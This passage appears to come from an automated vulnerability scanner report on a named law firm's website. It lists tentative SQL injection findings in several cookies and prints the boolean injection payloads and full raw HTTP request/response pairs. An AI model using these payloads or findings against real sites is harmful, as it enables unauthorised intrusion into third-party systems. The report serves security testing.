Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A44%3A2718225561'%20or%201%3d2--%20; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819537;path=/
Set-Cookie: CFTOKEN=91778988;path=/
Date: Thu, 12 May 2011 17:52:15 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><script type="text/javascript" src="/CFIDE/scripts/cfform.js"></script>
<script type="text/javascript" src="/CFIDE/scripts/masks.js"></script>

<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<META NAME="robots" CONTENT="noindex,nofollow">
<title>Forgot Password</title>
<link href="/scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/sIFR-screen.css" type="text/css" media="screen" />
<link rel="stylesheet" href="/scripts/sIFR-print.css" type="text/css" media="print" />
<script language="javascript" type="text/javascript" src="/scripts/sifr.js"></script>
<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #F3F4F4;
   margin-left: 0px;
   margin-top: 0px;
}
-->
</style>
<script language="javascript" type="text/javascript" src="scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.validate.js"></script>
<script language="javascript" type="text/javascript">
   $(document).ready(function(){
       $('#emailform').validate();
   })
</script>
<script type="text/javascript">
<!--
_CF_checkemailform = function(_CF_this)
{
//reset on submit
_CF_error_exists = false;
_CF_error_messages = new Array();
_CF_error_fields = new Object();
_CF_FirstErrorField = null;


//display error messages and return success
if( _CF_error_exists )
{
if( _CF_error_messages.length > 0 )
{
// show alert() message

...[SNIP]...

1.56. http://www.pillsburylaw.com/connect_forgotpassword.cfm [hubspotutk cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /connect_forgotpassword.cfm

Issue detail

The hubspotutk cookie appears to be vulnerable to SQL injection attacks. The payloads 74472467'%20or%201%3d1--%20 and 74472467'%20or%201%3d2--%20 were each submitted in the hubspotutk cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /connect_forgotpassword.cfm?p=99 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageID=99
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A44%3A27; hubspotutk=148ff71c54bf42a7b313024966931ee574472467'%20or%201%3d1--%20; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 17:52:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: HUBSPOTUTK=;expires=Wed, 12-May-2010 17:52:20 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /connect_forgotpassword.cfm?p=99 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageID=99
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A44%3A27; hubspotutk=148ff71c54bf42a7b313024966931ee574472467'%20or%201%3d2--%20; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819537;path=/
Set-Cookie: CFTOKEN=91778988;path=/
Date: Thu, 12 May 2011 17:52:20 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><script type="text/javascript" src="/CFIDE/scripts/cfform.js"></script>
<script type="text/javascript" src="/CFIDE/scripts/masks.js"></script>

<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<META NAME="robots" CONTENT="noindex,nofollow">
<title>Forgot Password</title>
<link href="/scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/sIFR-screen.css" type="text/css" media="screen" />
<link rel="stylesheet" href="/scripts/sIFR-print.css" type="text/css" media="print" />
<script language="javascript" type="text/javascript" src="/scripts/sifr.js"></script>
<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #F3F4F4;
   margin-left: 0px;
   margin-top: 0px;
}
-->
</style>
<script language="javascript" type="text/javascript" src="scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.validate.js"></script>
<script language="javascript" type="text/javascript">
   $(document).ready(function(){
       $('#emailform').validate();
   })
</script>
<script type="text/javascript">
<!--
_CF_checkemailform = function(_CF_this)
{
//reset on submit
_CF_error_exists = false;
_CF_error_messages = new Array();
_CF_error_fields = new Object();
_CF_FirstErrorField = null;


//display error messages and return success
if( _CF_error_exists )
{
if( _CF_error_messages.length > 0 )
{
// show alert() message

...[SNIP]...

1.57. http://www.pillsburylaw.com/connect_forgotpassword.cfm [hubspotvd cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /connect_forgotpassword.cfm

Issue detail

The hubspotvd cookie appears to be vulnerable to SQL injection attacks. The payloads 19197715'%20or%201%3d1--%20 and 19197715'%20or%201%3d2--%20 were each submitted in the hubspotvd cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /connect_forgotpassword.cfm?p=99 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageID=99
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A44%3A27; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee519197715'%20or%201%3d1--%20; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 17:52:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: HUBSPOTVD=;expires=Wed, 12-May-2010 17:52:26 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /connect_forgotpassword.cfm?p=99 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageID=99
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A44%3A27; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee519197715'%20or%201%3d2--%20; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819537;path=/
Set-Cookie: CFTOKEN=91778988;path=/
Date: Thu, 12 May 2011 17:52:26 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><script type="text/javascript" src="/CFIDE/scripts/cfform.js"></script>
<script type="text/javascript" src="/CFIDE/scripts/masks.js"></script>

<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<META NAME="robots" CONTENT="noindex,nofollow">
<title>Forgot Password</title>
<link href="/scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/sIFR-screen.css" type="text/css" media="screen" />
<link rel="stylesheet" href="/scripts/sIFR-print.css" type="text/css" media="print" />
<script language="javascript" type="text/javascript" src="/scripts/sifr.js"></script>
<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #F3F4F4;
   margin-left: 0px;
   margin-top: 0px;
}
-->
</style>
<script language="javascript" type="text/javascript" src="scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.validate.js"></script>
<script language="javascript" type="text/javascript">
   $(document).ready(function(){
       $('#emailform').validate();
   })
</script>
<script type="text/javascript">
<!--
_CF_checkemailform = function(_CF_this)
{
//reset on submit
_CF_error_exists = false;
_CF_error_messages = new Array();
_CF_error_fields = new Object();
_CF_FirstErrorField = null;


//display error messages and return success
if( _CF_error_exists )
{
if( _CF_error_messages.length > 0 )
{
// show alert() message

...[SNIP]...

1.58. http://www.pillsburylaw.com/connect_forgotpassword.cfm [hubspotvm cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /connect_forgotpassword.cfm

Issue detail

The hubspotvm cookie appears to be vulnerable to SQL injection attacks. The payloads 35384051'%20or%201%3d1--%20 and 35384051'%20or%201%3d2--%20 were each submitted in the hubspotvm cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /connect_forgotpassword.cfm?p=99 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageID=99
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A44%3A27; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee535384051'%20or%201%3d1--%20; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 17:52:38 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: HUBSPOTVM=;expires=Wed, 12-May-2010 17:52:38 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /connect_forgotpassword.cfm?p=99 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageID=99
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A44%3A27; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee535384051'%20or%201%3d2--%20; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819537;path=/
Set-Cookie: CFTOKEN=91778988;path=/
Date: Thu, 12 May 2011 17:52:38 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><script type="text/javascript" src="/CFIDE/scripts/cfform.js"></script>
<script type="text/javascript" src="/CFIDE/scripts/masks.js"></script>

<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<META NAME="robots" CONTENT="noindex,nofollow">
<title>Forgot Password</title>
<link href="/scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/sIFR-screen.css" type="text/css" media="screen" />
<link rel="stylesheet" href="/scripts/sIFR-print.css" type="text/css" media="print" />
<script language="javascript" type="text/javascript" src="/scripts/sifr.js"></script>
<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #F3F4F4;
   margin-left: 0px;
   margin-top: 0px;
}
-->
</style>
<script language="javascript" type="text/javascript" src="scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.validate.js"></script>
<script language="javascript" type="text/javascript">
   $(document).ready(function(){
       $('#emailform').validate();
   })
</script>
<script type="text/javascript">
<!--
_CF_checkemailform = function(_CF_this)
{
//reset on submit
_CF_error_exists = false;
_CF_error_messages = new Array();
_CF_error_fields = new Object();
_CF_FirstErrorField = null;


//display error messages and return success
if( _CF_error_exists )
{
if( _CF_error_messages.length > 0 )
{
// show alert() message

...[SNIP]...

1.59. http://www.pillsburylaw.com/connect_forgotpassword.cfm [hubspotvw cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /connect_forgotpassword.cfm

Issue detail

The hubspotvw cookie appears to be vulnerable to SQL injection attacks. The payloads 15063829'%20or%201%3d1--%20 and 15063829'%20or%201%3d2--%20 were each submitted in the hubspotvw cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /connect_forgotpassword.cfm?p=99 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageID=99
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A44%3A27; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee515063829'%20or%201%3d1--%20; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 17:52:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: HUBSPOTVW=;expires=Wed, 12-May-2010 17:52:32 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /connect_forgotpassword.cfm?p=99 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageID=99
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A44%3A27; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee515063829'%20or%201%3d2--%20; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819537;path=/
Set-Cookie: CFTOKEN=91778988;path=/
Date: Thu, 12 May 2011 17:52:32 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><script type="text/javascript" src="/CFIDE/scripts/cfform.js"></script>
<script type="text/javascript" src="/CFIDE/scripts/masks.js"></script>

<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<META NAME="robots" CONTENT="noindex,nofollow">
<title>Forgot Password</title>
<link href="/scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/sIFR-screen.css" type="text/css" media="screen" />
<link rel="stylesheet" href="/scripts/sIFR-print.css" type="text/css" media="print" />
<script language="javascript" type="text/javascript" src="/scripts/sifr.js"></script>
<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #F3F4F4;
   margin-left: 0px;
   margin-top: 0px;
}
-->
</style>
<script language="javascript" type="text/javascript" src="scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.validate.js"></script>
<script language="javascript" type="text/javascript">
   $(document).ready(function(){
       $('#emailform').validate();
   })
</script>
<script type="text/javascript">
<!--
_CF_checkemailform = function(_CF_this)
{
//reset on submit
_CF_error_exists = false;
_CF_error_messages = new Array();
_CF_error_fields = new Object();
_CF_FirstErrorField = null;


//display error messages and return success
if( _CF_error_exists )
{
if( _CF_error_messages.length > 0 )
{
// show alert() message

...[SNIP]...

1.60. http://www.pillsburylaw.com/index.cfm [CFID cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /index.cfm

Issue detail

The CFID cookie appears to be vulnerable to SQL injection attacks. The payloads 22027432%20or%201%3d1--%20 and 22027432%20or%201%3d2--%20 were each submitted in the CFID cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /index.cfm?pageID=60 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageid=12&itemid=1908
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A09%3A01; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=1181953722027432%20or%201%3d1--%20; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046; __utmb=249287046.1.10.1305218658

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 16:45:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=;expires=Wed, 12-May-2010 16:45:59 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /index.cfm?pageID=60 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageid=12&itemid=1908
